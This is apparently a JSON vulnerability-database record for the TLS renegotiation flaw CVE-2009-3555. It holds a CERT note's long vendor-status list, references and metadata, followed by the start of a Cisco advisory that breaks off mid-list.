Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Redback Networks, Inc. Not Affected\n\nNotified: November 05, 2009 Updated: November 11, 2009 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### SafeNet __ Not Affected\n\nNotified: November 05, 2009 Updated: November 19, 2009 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nAccording to SafeNet their products that make use of SSL/TLS use it with proprietary messaging protocols that set up the authenticated session at the beginning of the transmission and do not allow the sort of requested Renegotiate that makes this vulnerability exploitable.\n\n### libgcrypt Not Affected\n\nNotified: November 05, 2009 Updated: November 11, 2009 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### 3com Inc Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ACCESS Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### AT&amp;T Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Alcatel-Lucent Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Apache HTTP Server Project Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Apache-SSL Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Apple Inc. Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Aruba Networks, Inc. Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Attachmate Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Avaya, Inc. Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Belkin, Inc. Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Borderware Technologies Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Certicom Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Charlotte's Web Networks Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Check Point Software Technologies Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Cisco Systems, Inc. Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Clavister Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Computer Associates Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Conectiva Inc. Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Cray Inc. Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Crypto++ Library Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### D-Link Systems, Inc. Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### DragonFly BSD Project Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### EMC Corporation Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Engarde Secure Linux Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Enterasys Networks Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Ericsson Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Extreme Networks Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### F5 Networks, Inc. Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Fedora Project Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Fortinet, Inc. Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Foundry Networks, Inc. Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### FreeBSD Project Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Fujitsu Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Gentoo Linux Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Global Technology Associates, Inc. Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Hitachi Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### IBM eServer Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### IP Filter Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### IP Infusion, Inc. Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Infoblox Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Intel Corporation Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Internet Security Systems, Inc. Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Intoto Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Juniper Networks, Inc. Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Lotus Software Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Luminous Networks Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Mandriva S. A. Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Microsoft Corporation __ Unknown\n\nNotified: November 05, 2009 Updated: June 02, 2010 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nMicrosoft has published the following advisory:\n\n<http://www.microsoft.com/technet/security/advisory/977377.mspx> \nMicrosoft has also released an update that disables TLS/SSL renegotiation. More information is available at the following Microsoft Knowledge Base Article: \n<http://support.microsoft.com/kb/977377>\n\n### Microsoft Internet Explorer Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Mirapoint, Inc. Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### MontaVista Software, Inc. Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Mozilla - Network Security Services __ Unknown\n\nNotified: November 05, 2009 Updated: June 02, 2010 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe following information has been published:\n\n<https://wiki.mozilla.org/Security:Renegotiation>\n\n### Multitech, Inc. Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### NEC Corporation Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### National Center for Supercomputing Applications Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### NetApp Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### NetBSD Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Netscape NSS Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Nokia Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Nortel Networks, Inc. Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Novell, Inc. Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### OpenBSD Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### OpenSSL Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Openwall GNU/*/Linux Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### PePLink Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Process Software Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Q1 Labs Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### QNX Software Systems Inc. Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Quagga Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### RadWare, Inc. Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Red Hat, Inc. Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### SUSE Linux Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Secureworx, Inc. Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Silicon Graphics, Inc. Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Slackware Linux Inc. Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### SmoothWall Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Snort Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Soapstone Networks Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Sony Corporation Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Sourcefire Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Spyrus Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Stonesoft Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Stunnel Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Symantec Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### The SCO Group Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### TippingPoint Technologies Inc. Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Turbolinux Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Ubuntu Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Unisys Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### VMware Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vyatta Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Watchguard Technologies, Inc. Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Wind River Systems, Inc. Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ZyXEL Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### eSoft, Inc. Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### m0n0wall Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### mod_ssl Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### netfilter Unknown\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\nView all 111 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 0 | AV:--/AC:--/Au:--/C:--/I:--/A:-- \nTemporal | 0 | E:ND/RL:ND/RC:ND \nEnvironmental | 0 | CDP:ND/TD:ND/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <http://extendedsubset.com/?p=8>\n * <http://www.links.org/?p=780>\n * <http://www.links.org/?p=786>\n * <http://www.links.org/?p=789>\n * <http://blogs.iss.net/archive/sslmitmiscsrf.html>\n * <http://www.ietf.org/mail-archive/web/tls/current/msg03948.html>\n * <https://bugzilla.redhat.com/show_bug.cgi?id=533125>\n * <http://lists.gnu.org/archive/html/gnutls-devel/2009-11/msg00014.html>\n * <http://cvs.openssl.org/chngview?cn=18790>\n * <http://www.links.org/files/no-renegotiation-2.patch>\n * <http://blog.zoller.lu/2009/11/new-sslv3-tls-vulnerability-mitm.html>\n * <https://svn.resiprocate.org/rep/ietf-drafts/ekr/draft-rescorla-tls-renegotiate.txt>\n * <http://www.educatedguesswork.org/2009/11/understanding_the_tls_renegoti.html>\n\n### Acknowledgements\n\nThanks to Marsh Ray of PhoneFactor for reporting this vulnerability. This issue was also independently discovered and publicly disclosed by Martin Rex of SAP.\n\nThis document was written by Chris Taschner.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2009-3555](<http://web.nvd.nist.gov/vuln/detail/CVE-2009-3555>) \n---|--- \n**Date Public:** | 2009-11-05 \n**Date First Published:** | 2009-11-11 \n**Date Last Updated: ** | 2011-07-22 12:47 UTC \n**Document Revision: ** | 38 \n", "modified": "2011-07-22T12:47:00", "published": "2009-11-11T00:00:00", "id": "VU:120541", "href": "https://www.kb.cert.org/vuls/id/120541", "type": "cert", "title": "SSL and TLS protocols renegotiation vulnerability", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T18:30:52", "description": "No description provided by source.", "published": "2009-11-10T00:00:00", "type": "seebug", "title": "Cisco Security Advisory: Transport Layer Security Renegotiation Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3555"], "modified": "2009-11-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-12600", "id": "SSV:12600", "sourceData": "\n -----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nCisco Security Advisory: Transport Layer Security Renegotiation\r\nVulnerability\r\n\r\nAdvisory ID: cisco-sa-20091109-tls\r\n\r\nhttp://www.cisco.com/warp/public/707/cisco-sa-20091109-tls.shtml\r\n\r\nRevision 1.0\r\n\r\nFor Public Release 2009 November 9 1600 UTC (GMT)\r\n\r\nSummary\r\n=======\r\n\r\nAn industry-wide vulnerability exists in the Transport Layer Security\r\n(TLS) protocol that could impact any Cisco product that uses any version\r\nof TLS and SSL. The vulnerability exists in how the protocol handles\r\nsession renegotiation and exposes users to a potential man-in-the-middle\r\nattack.\r\n\r\nThis advisory is posted at\r\nhttp://www.cisco.com/warp/public/707/cisco-sa-20091109-tls.shtml.\r\n\r\nAffected Products\r\n=================\r\n\r\nCisco is currently evaluating products for possible exposure to these\r\nTLS issues. Products will only be listed in the Vulnerable Products or\r\nProducts Confirmed Not Vulnerable sections of this advisory when a final\r\ndetermination about product exposure is made. Products that are not\r\nlisted in either of these two sections are still being evaluated.\r\n\r\nVulnerable Products\r\n- -------------------\r\n\r\nThis section will be updated when more information is available.\r\n\r\nProducts Confirmed Not Vulnerable\r\n- ---------------------------------\r\n\r\nThe following products are confirmed not vulnerable:\r\n\r\n * Cisco 